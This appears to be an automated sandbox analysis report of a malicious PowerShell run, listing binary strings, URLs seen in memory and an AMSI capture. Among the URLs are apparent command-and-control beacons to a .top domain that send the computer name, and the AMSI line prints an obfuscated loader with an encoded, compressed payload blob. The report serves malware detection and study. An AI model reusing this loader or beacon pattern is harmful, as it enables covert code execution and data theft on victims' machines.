Source: | Binary string: System.Management.Automation.pdb` source: powershell.exe, 00000000.00000002.38539569776.00000208556C2000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: Microsoft.PowerShell.Commands.Utility.pdb1-F424491E3931}\InprocServer32 source: powershell.exe, 00000000.00000002.38539569776.00000208556C2000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: softy.pdbll source: powershell.exe, 00000000.00000002.38573770796.000002086F922000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.38539569776.000002085573B000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000000.00000002.38575014675.000002086FA80000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb}d- source: powershell.exe, 00000000.00000002.38575014675.000002086FA80000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\mscorlib.pdb source: powershell.exe, 00000000.00000002.38575014675.000002086FB59000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.38575014675.000002086FB59000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.38575014675.000002086FB36000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: ion.pdb source: powershell.exe, 00000000.00000002.38575014675.000002086FB59000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: *on.pdbions> source: powershell.exe, 00000000.00000002.38575014675.000002086FA3E000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb5 source: powershell.exe, 00000000.00000002.38577702964.000002086FFCB000.00000004.00000020.00020000.00000000.sdmp |
Source: powershell.exe, 00000000.00000002.38540827413.0000020858D38000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://$xj1vk50pz9qhu76/$8we23fnb5gpov6i.php? |
Source: powershell.exe, 00000000.00000002.38540827413.0000020857B4B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.38540827413.0000020859E56000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.38540827413.000002085A19A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.38540827413.0000020858A8B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://$xj1vk50pz9qhu76/$8we23fnb5gpov6i.php?id=$env:computername&key=$goxrdny&s=527 |
Source: powershell.exe, 00000000.00000002.38575014675.000002086FA80000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.PP |
Source: powershell.exe, 00000000.00000002.38573770796.000002086F922000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06 |
Source: powershell.exe, 00000000.00000002.38573770796.000002086F922000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0 |
Source: powershell.exe, 00000000.00000002.38577476843.000002086FC40000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.micr |
Source: powershell.exe, 00000000.00000002.38575014675.000002086FB59000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.~ |
Source: powershell.exe, 00000000.00000002.38540827413.000002085854B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.38540827413.0000020858B2E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.38540827413.0000020858A8B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://kdemjgebjimkanl.top |
Source: powershell.exe, 00000000.00000002.38540827413.0000020858A8B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://kdemjgebjimkanl.top/m0lf52z7dihtr.php?id=computer&key=66194449366&s=527 |
Source: powershell.exe, 00000000.00000002.38540827413.0000020858A8B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://kdemjgebjimkanl.top/m0lf52z7dihtr.php?id=computer&key=66194449366&s=527p |
Source: powershell.exe, 00000000.00000002.38568053752.0000020867995000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 00000000.00000002.38540827413.0000020857B4B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000000.00000002.38540827413.0000020857B4B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.pngXzVs |
Source: powershell.exe, 00000000.00000002.38540827413.0000020857B4B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/ |
Source: powershell.exe, 00000000.00000002.38540827413.0000020857921000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 00000000.00000002.38540827413.0000020857B4B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/ |
Source: powershell.exe, 00000000.00000002.38540827413.0000020857B4B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 00000000.00000002.38540827413.0000020857B4B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlXzVs |
Source: powershell.exe, 00000000.00000002.38540827413.0000020858744000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.38540827413.0000020858B2E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.38540827413.0000020858B4B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.38540827413.0000020858B38000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.google.com |
Source: powershell.exe, 00000000.00000002.38540827413.0000020858D38000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.38540827413.0000020858A8B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.google.com/ |
Source: powershell.exe, 00000000.00000002.38540827413.0000020858B4B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.google.com/&q=EgRmgZnuGJPJy7sGIjAGqlvERXPzShkPlNLjMFSvPtoc3E4y0-JVbcxkHnhkOaQwihcwIYeXll0 |
Source: powershell.exe, 00000000.00000002.38540827413.0000020858744000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.38540827413.0000020858B38000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.google.com/sorry/index?continue=http://www.google.com/&q=EgRmgZnuGJPJy7sGIjAGqlvERXPzShkP |
Source: powershell.exe, 00000000.00000002.38540827413.0000020858744000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.google.com0 |
Source: powershell.exe, 00000000.00000002.38573770796.000002086F922000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.quovadis.bm0 |
Source: powershell.exe, 00000000.00000002.38540827413.0000020857921000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68 |
Source: powershell.exe, 00000000.00000002.38568053752.0000020867995000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 00000000.00000002.38568053752.0000020867995000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 00000000.00000002.38568053752.0000020867995000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License |
Source: powershell.exe, 00000000.00000002.38540827413.0000020858B38000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://csp.withgoogle.com/csp/gws/other-hp |
Source: powershell.exe, 00000000.00000002.38540827413.0000020857B4B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000000.00000002.38540827413.0000020857B4B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/PesterXzVs |
Source: powershell.exe, 00000000.00000002.38540827413.000002085941D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro |
Source: powershell.exe, 00000000.00000002.38568053752.0000020867995000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe |
Source: powershell.exe, 00000000.00000002.38573770796.000002086F922000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ocsp.quovadisoffshore.com0 |
Source: powershell.exe, 00000000.00000002.38540827413.0000020858B5E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.38540827413.0000020858755000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.38540827413.0000020858B2E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.38540827413.0000020858B58000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/recaptcha/api.js |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFD39628066 | 0_2_00007FFD39628066 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFD39628E12 | 0_2_00007FFD39628E12 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFD3961C3DB | 0_2_00007FFD3961C3DB |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFD3961EC40 | 0_2_00007FFD3961EC40 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFD3961F2B3 | 0_2_00007FFD3961F2B3 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFD39620EFA | 0_2_00007FFD39620EFA |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress)) $ery1u6abt8kzvqf.(([char[]]@((3701-(9328478/(5404-2837))),(-8432+8543),(1027824/(58182180/(7937680/1252))),(-3743+(2279760/(411+179))),(385140/4585),(-8417+(4072+4456))) -join ''))( $vb6t0ze4my3ul8f ) $ery1u6abt8kzvqf.(([char[]]@((102309/1527),(5611-(813+(12021-7331))),(-5490+(39055773/(7426245/(6928-5863)))),(-4277+(-4724+(5756+3360))),(2487-(21543194/9029))) -join ''))()$4zudplrcemfx0w9.(([char[]]@((-4099+(23287940/5590)),(488484/4523),(1090242/9822),(78315/(7943-(17363-10101))),(2686-2585)) -join ''))()[byte[]] $0s2eox1rbc3i5vz = $vb6t0ze4my3ul8f.((-join (@((6550-(3933+(14040419/(9486-(14596986/3702))))),(10060-(15412-(3608+1855))),(-7853+7918),(-7871+7985),(9071-8957),(451341/(-3976+8629)),(3378-3257))| ForEach-Object { [char]$_ })))() $3mqe4b7hsju19rc=$0s2eox1rbc3i5vz return $3mqe4b7hsju19rc}[System.Text.Encoding]::ascii.((-join (@((6421-(27273250/4295)),(628119/6219),(106+10),(-2238+2321),(4547-(-2888+7319)),(-2222+(15709600/6725)),(232260/2212),(-5970+6080),(-7910+8013))| ForEach-Object { [char]$_ })))((5irawk2dpqsbxzn61j3of79v80c "K+FyZHQ1bGhmMMrqb+VnswWw8ysiz4Y2VIZJDUNOs0dwuH8G1la/YpayUGAgcDVVRq7R4jdoToPd1zwjSew5Ntb9SPoi/sI5w7TPzyKYOT3PfwkLVpWkGozRlZUZf1mNwrTRI0trURaU1Imbx3W0e8iP1hCc3KaFUz2dWyhIEpOTZ0jITZqOlojeF3+VL9nKT5bNl9/Aszee2Z6lI8XUqlvKGh2N2rK9h1G9E5pAi5Cn+3gpavdF2YeCx6PpV2jJyIbJA5Pqc5caDMnPk9SKs2xYVf4wVw7XWN+NFQJDmu8B3dbAhHetVhZuDmBT2aAdewdUWfv7W03EhvFmnxRLA8feFo7ZAZW8iTk1L32AhPvLx9PQUtW0wfjr23ThXtT48HggbR2YyR0/7C3/p829PI9t4wGEojQYb+fHv4Z/97Lj3jIVnTYgIl3eXV5MfMTExP5pj/1mc9hntrvgLRmpkwO7h1+tH/lrUOBjAnlA90m6diFaRQszNavRMoIQ3Eojiga5CiB3RSODGtzWeHxlI5X/UjAC/BFnD3IxzxHFoYRLntTz8r3L600zp4O6WP5TAdFGgyqiMK6GK/lgU7cAzo5buLoh6B2ZdXV14Ynz4QXl4l7xGX2jk5ja61ddj5uhT2VkyQuIk6Wbs8y1e+1VekiPG5GH3ZhMyBYMEsBa0pCQ+1hoO61kDlmtRL5y062Xh/zUIaEvVdpwhjExRNn3uo5P8EG2rt9UslwJBkmpGGUcJEKGJxzk5pkAoKTfgYW6F9io/DJs4l2tqp+X4gkRGp+vvjSHdBLvB/JjXNmHyFjh6d4SCvIjh9xEAMUnhxhoGYOd3HvTtBLJVqSkXzUxT0Zvh3TfrGmx+jcEsC0FF46VZXAV2nac8o/hRd6i6pfX7mBEuLlqndTU9rWDz+4lhi9NswibayxPTlr+teMra4NYiFiLyp0dA+vpFpGf9bL1c62hM+OaoqccyoOgC5aOMnAqupsNP5Gdq2VFuQrNkO+pn/mLjLZHeC2cEErG5pfNIfWbZcfXr2PdG8RDFtrN14G9KZ0GZiQ+hdJmtizeRB4Mr3iYa/SlH4jMjY89TZ+hw/TGGIPcFe7IA0nECNSlF5lu9at0IFZVRbddI68/2uSTs/lz7i5sT+isqMLARXp2/lhud8KAOGsFiulqImh/zKW7lOLFveOnRdqj7HrLFROvSDZTbgGRRLC9JwQfrgoMUkDwnOCf8qi7FnvR1WZfAjSQGXZW1CdO3PPkbPLhrV4jhKWTxpscW/s1PK2Sgb5HxM7wh8Q+MFtN93NyJvN5penAR8hJPgeH+ATxfzNMI2FJltKFTZH2nJvDY2etT5uYn331SsqKF1z |